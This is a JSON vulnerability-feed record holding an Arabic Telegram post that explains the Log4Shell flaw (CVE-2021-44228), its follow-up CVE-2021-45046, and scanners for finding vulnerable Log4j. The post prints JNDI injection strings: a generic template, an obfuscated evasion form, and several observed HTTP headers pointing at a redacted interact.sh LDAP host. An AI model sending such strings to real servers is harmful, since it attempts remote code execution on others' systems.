{"uuid": "b52baf56-2f10-4874-a6a3-a432690013bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hacker_trick/555", "content": "\u062b\u063a\u0631\u0629 Log4Shell \n\u0627\u0644\u0623\u0633\u0628\u0648\u0639 \u0627\u0644\u0645\u0627\u0636\u064a \u062a\u0645 \u0637\u0631\u062d\u00a0\u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u0623\u062f\u0627\u0629 \u0627\u0644\u062a\u0633\u062c\u064a\u0644 Log4j \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u062b\u063a\u0631\u0629\u00a0CVE-2021-44228 \u062d\u064a\u062b \u062a\u0645 \u0625\u0644\u063a\u0627\u0621 \u0627\u062a\u0627\u062d\u0629 \u062c\u0627\u0646\u0628 \u0648\u0627\u062d\u062f \u0641\u0642\u0637 \u0645\u0646 \u0648\u0638\u0627\u0626\u0641 \u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a JNDI \u062b\u0645 \u062a\u0628\u064a\u0646 \u0623\u0646\u0647 \u0644\u0627 \u064a\u0632\u0627\u0644 \u0645\u0646 \u0627\u0644\u0645\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u0648\u0644\u0643\u0646 \u062a\u0645 \u062d\u062c\u0628 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629 \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u0644\u062e\u0637\u0623 \u0644\u0645\u0646\u0639 \u0627\u0644\u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n_ \u0623\u0642\u0631\u062a \u0634\u0631\u0643\u0629 Apache \u0628\u0627\u0644\u062e\u0637\u0623 \u0645\u0631\u0629 \u0623\u062e\u0631\u0649 \u0648\u0644\u0630\u0644\u0643 \u0642\u0627\u0645\u062a \u0628\u062a\u0639\u0637\u064a\u0644 \u0643\u0627\u0641\u0629 \u062f\u0639\u0645 JNDI \u0628\u0634\u0643\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0648\u0625\u0632\u0627\u0644\u0629 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u062a\u0645\u0627\u0645\u0627 \u0648\u0642\u0627\u0645\u062a \u0628\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u0627\u0646\u064a Log4j 2.16 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062e\u0637\u0623 \u0627\u0644\u0630\u064a \u062a\u0645 \u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0640 CVE-2021-45046 \n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u062b\u063a\u0631\u0629 Log4Shell ..\u061f\n\u0628\u062f\u0627\u064a\u0629\u064b \u0645\u0627 \u0647\u0648 Log4j \u0648 JNDI ..\u061f\nLog4j\n\u0645\u0643\u062a\u0628\u0629 Java \u0628\u0645\u062b\u0627\u0628\u0629 \u0623\u062f\u0627\u0629 \u0645\u0633\u0627\u0639\u062f\u0629 \u062a\u0633\u062a\u062e\u062f\u0645 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639 \u0641\u064a \u0628\u0631\u0627\u0645\u062c Java \u0644\u062a\u0633\u062c\u064a\u0644 \u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u064a\u0636\u0627 \u0641\u064a \u062e\u062f\u0645\u0627\u062a cloud computing\n\nJNDI\n\u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a Java APIs \u062a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 Log4j \u0644\u0627\u0633\u062a\u0631\u062f\u0627\u062f \u0627\u0644\u0639\u0646\u0627\u0635\u0631 \u0648\u0627\u0644\u0643\u0627\u0626\u0646\u0627\u062a \u0645\u0646 \u0648\u062d\u062f\u0627\u062a \u0627\u0644\u062e\u062f\u0645\u0629 \u0627\u0644\u0628\u0639\u064a\u062f\u0629 \u0648\u064a\u0645\u0643\u0646 \u0644\u0647 \u0627\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0645\u0646 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0648\u0627\u062c\u0647\u0627\u062a \u0627\u0644\u062f\u0644\u064a\u0644 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 \u0648\u0627\u062c\u0647\u0629\u00a0\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0627\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u062e\u0641\u064a\u0641 \u0625\u0644\u0649 \u0627\u0644\u062f\u0644\u064a\u0644\u00a0LDAP \u0648\u0646\u0638\u0627\u0645 \u0627\u0633\u0645\u0627\u0621 \u0627\u0644\u0645\u062c\u0627\u0644\u00a0(DNS) \u0648\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 (IIOP) \n\n\u0633\u0628\u0628 \u0627\u0644\u062e\u0644\u0644\n\u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0645\u064a\u0632\u0629 \u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644\u00a0\u0633\u062a\u0643\u062a\u0634\u0641 Log4j \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u0627\u0644\u062a\u064a \u062a\u0634\u064a\u0631 \u0625\u0644\u0649 \u0645\u0648\u0627\u0631\u062f JNDI \u0641\u064a \u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0648\u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0633\u062c\u0644 \u0648\u0627\u0644\u0645\u0639\u0627\u0645\u0644\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0645 \u062a\u0645\u0631\u064a\u0631\u0647\u0627 \u0628\u0648\u0627\u0633\u0637\u0629 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a\u060c \u0648\u0646\u0638\u0631\u0627 \u0644\u0623\u0646 Log4j \u0644\u0627 \u064a\u0642\u0648\u0645 \u0628\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0627\u0644\u062a\u064a \u062a\u0645 \u0625\u0631\u0633\u0627\u0644\u0647\u0627 \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0634\u0627\u0621 \u0637\u0644\u0628\u0627\u062a \u0636\u0627\u0631\u0629 \u0644\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 Log4j \u0628\u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a \u0627\u0644\u062d\u0642\u0648\u0644 \u0627\u0644\u062a\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0628\u062e\u0648\u0627\u062f\u0645 \u0636\u0627\u0631\u0629\n\u0639\u0644\u0649 \u0633\u0628\u064a\u0644 \u0627\u0644\u0645\u062b\u0627\u0644 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0648\u064a\u0628 \u0646\u0638\u0631\u0627 \u0644\u0623\u0646\u0647 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644 \u0637\u0644\u0628\u0627\u062a\u00a0HTTP\u00a0\u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631 \u0641\u0625\u0646 \u0645\u062a\u062c\u0647 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0634\u0627\u0626\u0639 \u0647\u0648 \u0648\u0636\u0639 \u0627\u0644\u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u0636\u0627\u0631\u0629 \u0641\u064a\u00a0\u0639\u0646\u0648\u0627\u0646 url \u0644\u0637\u0644\u0628 HTTP \u0623\u0648\u00a0\u0631\u0623\u0633 HTTP\u00a0\u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647 \u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631\n\u0645\u062b\u0644: \n\u00a0${jndi:[protocol]://[remote server and code address]}\n\u064a\u062a\u0645 \u0639\u0631\u0636 \u0639\u0646\u0648\u0627\u0646 url \u0627\u0644\u0630\u064a \u0642\u0627\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0639\u0646\u0635\u0631 Java \u0648\u0628\u0639\u062f\u0647\u0627 \u064a\u062a\u0645 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u062a\u0635\u0644\u0627 \u0628\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a \u0648\u0628\u0625\u062f\u062e\u0627\u0644 \u0633\u0644\u0633\u0644\u0629 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647\u0627 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u062d\u0645\u064a\u0644 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0645\u0633\u062a\u0636\u0627\u0641\u0629 \u0639\u0644\u0649 \u0639\u0646\u0648\u0627\u0646 url \u0639\u0627\u0645 \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u062a\u0644\u0642\u0627\u0626\u064a\u0627 \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629\n\u064a\u0648\u062c\u062f \u0645\u062c\u0645\u0648\u0639\u0629 \u0645\u062a\u0646\u0648\u0639\u0629 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u062a\u0639\u062a\u064a\u0645 \u062a\u064f\u0633\u062a\u062e\u062f\u0645 \u0644\u0645\u0646\u0639 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0641\u062d\u0635 \u0623\u0648 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0645\u062b\u0644:\n($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})\u00a0\n\u0628\u0639\u0636 \u0631\u0624\u0648\u0633 HTTP \u0627\u0644\u062a\u064a \u0644\u0627\u062d\u0638\u0647\u0627 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0641\u064a \u0637\u0644\u0628 GET\u00a0\nreferer=${jndi:ldap://[redacted].interact.sh}\nx-http-host-override=${jndi:ldap://[redacted].interact.sh}\ntrue-client-ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}\ncf-connecting_ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-host=${jndi:ldap://[redacted].interact.sh}\ncontact=${jndi:ldap://[redacted].interact.sh} \n\n\u0644\u0627\u062d\u0638 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0623\u064a\u0636\u0627 \u062a\u062d\u0648\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0625\u0644\u0649 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a RMI \u0628\u062f\u0644\u0627 \u0645\u0646 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 LDAP \n\nLog4j 2.16.0 _ CVE-2021-45046 \nhttps://logging.apache.org/log4j/2.x/security.html\n\n\u0644\u0641\u062d\u0635 \u062b\u063a\u0631\u0627\u062a Log4Shell \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 log4j 2.15.0 \u0627\u0644\u0645\u0635\u0646\u0641\u0629 CVE-2021-45046\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\nFind vulnerable Log4j2 versions on disk and also inside Java Archive Files\nhttps://github.com/fox-it/log4j-finder", "creation_timestamp": "2021-12-17T00:07:48.000000Z"}